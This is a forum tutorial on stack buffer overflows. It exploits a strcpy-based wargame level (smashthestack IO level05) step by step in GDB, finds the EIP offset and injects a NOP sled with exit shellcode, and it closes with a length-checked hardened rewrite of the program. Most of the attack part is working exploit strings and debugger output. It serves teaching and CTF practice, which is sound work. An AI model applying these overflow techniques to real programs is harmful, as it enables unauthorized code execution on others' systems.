Stack Overflow Code Execution Basics

This is an article on Stack Overflow Code Execution Basics in Ethical hacking Tips.
This is a continuation of my previous article on Stack Overflows - Basics of EIP Overwrite. I suggest glancing over it before reading further.

Again in this article we'll be using a vulnerable program to demonstrate the attack. Our main goal is to redirect the vulnerable program's flow of execution and make it do what we want it to do.

In this article I am taking the exploitation to the next level: we'll be exploiting a simple wargame level.

And I'll be exploiting this code on their machine only.

Exploiting


Code: c
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
    char buf[128];

    if(argc < 2) return 1;

    /* unbounded copy: an argv[1] longer than 127 bytes runs past buf
       and over the saved frame pointer and return address */
    strcpy(buf, argv[1]);
    printf("%s\n", buf);
    return 0;
}
I'll be using a basic exit shellcode for demonstration purposes, but any shellcode of reasonable size could be used against this program.

So let's put on our grey thinking hats and get started.

Basically, to exploit this program we have to overwrite the EIP register, which we already learned how to do in the previous tutorial, so I'll not be repeating that.

Now what we want is to overwrite EIP and make it point to our shellcode, so that we gain control of execution.

So let's first ssh to their machine:

Code:
aneesh@aneesh-laptop:~$ ssh level5@io.smashthestack.org -p2224
level5@io.smashthestack.org's password: 
 ______   _____
/\__  _\ /\  __`\
\/_/\ \/ \ \ \/\ \      Levels are in /levels
   \ \ \  \ \ \ \ \     Passes are in ~/.pass
    \_\ \__\ \ \_\ \
    /\_____\\ \_____\   Server admin: beach (beach@smashthestack.org)
    \/_____/ \/_____/   Server janitor: bla

        1. No DoS, local or otherwise
        2. Do not try to connect to remote systems from this box
        3. Only two connections per IP are allowed
        4. Quotas are in place so don't waste resources
        5. This rules list is not all inclusive and is subject to change
        6. Have fuN++

				(28 levels)

- use long(>5char) names in /tmp, short stuff is periodically deleted, as are
easily guessable ones
- o and feel free to leave your email in /home/email.list (it's writeonly)

-  Thanks everybody for the new translations!

level5@io:~$
level5@io:~$ cd /levels/
level5@io:/levels$ ls
beta	       level06_alt	 level10       level16	      level23.c
level01        level06_alt.c	 level10.c     level16.c      level24
level02        level06_alt.pass  level11       level16.pass   level24.c
level02_alt    level06.c	 level11.c     level17	      level25
level02_alt.c  level07		 level12       level17.c      level25.c
level03        level07_alt	 level12.c     level18	      level26
level03.c      level07_alt.c	 level12.pass  level18.c      level26.l
level04        level07.c	 level13       level18_cross  level26.y
level04.c      level08		 level13.c     level19	      level27
level05        level08_alt	 level14       level19.c      level27.c
level05_alt    level08_alt.cpp	 level14.c     level20	      level27.pass
level05_alt.c  level08.c	 level15       level21	      level28
level05.c      level09		 level15.c     level22	      level28.c
level06        level09.c	 level15.pass  level23
level5@io:/levels$ cat level0
level01           level04.c         level06_alt.c     level08
level02           level05           level06_alt.pass  level08_alt
level02_alt       level05_alt       level06.c         level08_alt.cpp
level02_alt.c     level05_alt.c     level07           level08.c
level03           level05.c         level07_alt       level09
level03.c         level06           level07_alt.c     level09.c
level04           level06_alt       level07.c         
level5@io:/levels$ cat level05
level05        level05_alt    level05_alt.c  level05.c      
level5@io:/levels$
Note: I'll not be revealing the password for this level, as that's not allowed.

Let's now run it in GDB and exploit it:

Code:
level5@io:/levels$ gdb ./level05
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb)
Now let's place a breakpoint at the beginning of the program and run it:

Code:
(gdb) break main
Breakpoint 1 at 0x80483bd
Let's run it with an argument of 160 A's.
We'll use a one-line Python command to generate the attack string (the program's input):
Code:
(gdb) run `python -c 'print"\x41"*160'`
Starting program: /levels/level05 `python -c 'print"\x41"*160'`
Breakpoint 1, 0x080483bd in main ()
Now step through the program and see what happens:

Code:
(gdb) s
Single stepping until exit from function main, 
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0x41414141 in ?? ()
(gdb)
OK, it's pretty obvious that we have overwritten EIP with 0x41414141. (GDB reports that it cannot access memory at that address because 0x41414141 is an arbitrary value that is not mapped in the program's user space, so the program cannot jump to it.)

Now let's try a few different lengths to get a basic picture of what's happening:

Code:
(gdb) run `python -c 'print"\x41"*140'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level05 `python -c 'print"\x41"*140'`

Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main, 
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Cannot access memory at address 0x41414145
(gdb)
So, do you see the pattern now?

It means that to overwrite EIP with an address of our choosing, we end up with the following attack-string layout:

Code:
[Garbage string]        [EIP]
       |                  |
       |                  |
  140 bytes long     the desired address
                     to overwrite EIP with
Let's test it:

Code:
(gdb) run `python -c 'print"\x41"*140+"\x42"*4'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4'`

Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main, 
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
0x42424242 in ?? ()
Boom... we have full control over the EIP overwrite.
Now we need to inject our shellcode and point EIP at it.

Let's first look at where our data goes:

Code:
(gdb) run `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'`

Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main, 
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCC
0x42424242 in ?? ()
(gdb) x/10bx $esp
0xbfffdc80:	0x43	0x43	0x43	0x43	0x43	0x43	0x43	0x43
0xbfffdc88:	0x43	0x43
(gdb)
OK, so from the above we conclude with the following attack-string layout:

Code:
[Garbage string]        [EIP]                    [ESP]
       |                  |                        |
       |                  |                        |
  140 bytes long     the desired address     the data that will sit
                     to overwrite EIP with   at ESP (on the stack)
So we have a large amount of data space at ESP. We can place our shellcode there and overwrite EIP with its address.

Let's do it!

We'll again be using the same exit shellcode from the previous article:

Code:
(gdb) run `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'`

Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main, 
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������������1��#1۳̀
0xbfffdc80 in ?? ()
(gdb) continue
Continuing.

Program exited with code 07.
(gdb)
Woah! We did it. The exit code 07 is the value our shellcode passes to exit() (it sets bl to 7 before the int 0x80), so it confirms the shellcode ran rather than the program's own return 0. Now the explanation.

Attack-string
Code:
"\x41"*140 + "\x80\xdc\xff\xbf" + "\x90"*10 + "\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"
     |               |                  |                        |
  Garbage      Hard-coded address    NOP sled           The exit shellcode
  string       of ESP in little-
               endian format
The NOP sled is simply a run of \x90 (nop) instructions; this instruction does nothing.
We use it to make the attack string more robust: with every new execution of the program the stack address may shift slightly, and as long as the hard-coded address lands anywhere inside the sled, execution slides down into the shellcode. Without the NOP sled, the attack string would fail.

That's all for this article. Stay tuned for more.
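For the defender's side of the same bug, here is the level05 program with its strcpy replaced by a length-checked copy. This is an added example, not code from the original post or from the wargame; copy_arg_checked and BUF_SIZE are names chosen here.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 128   /* same buffer size as the level05 program */

/* Copy arg into buf only if it fits, including the terminating NUL.
 * Returns 1 on success and 0 when the input is rejected. Rejecting
 * outright (rather than silently truncating) means nothing is ever
 * written past buf, so the saved EIP on the stack cannot be reached. */
int copy_arg_checked(char *buf, size_t buflen, const char *arg) {
    size_t len = strlen(arg);
    if (len >= buflen) {
        return 0;
    }
    memcpy(buf, arg, len + 1);
    return 1;
}

/* Hardened version of the wargame program: identical output for
 * arguments up to 127 bytes, an error (and no overflow) beyond that. */
int main(int argc, char **argv) {
    char buf[BUF_SIZE];

    if (argc < 2) return 1;

    if (!copy_arg_checked(buf, sizeof buf, argv[1])) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 2;
    }
    printf("%s\n", buf);
    return 0;
}
```

With this check in place, the 160-byte and 144-byte inputs used above are refused before any byte is written, so the program never reaches the `0x41414141 in ?? ()` state.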
12Feb2011,11:01   #2
Thanks for accepting...
Hope people can get a better understanding of stack overflows.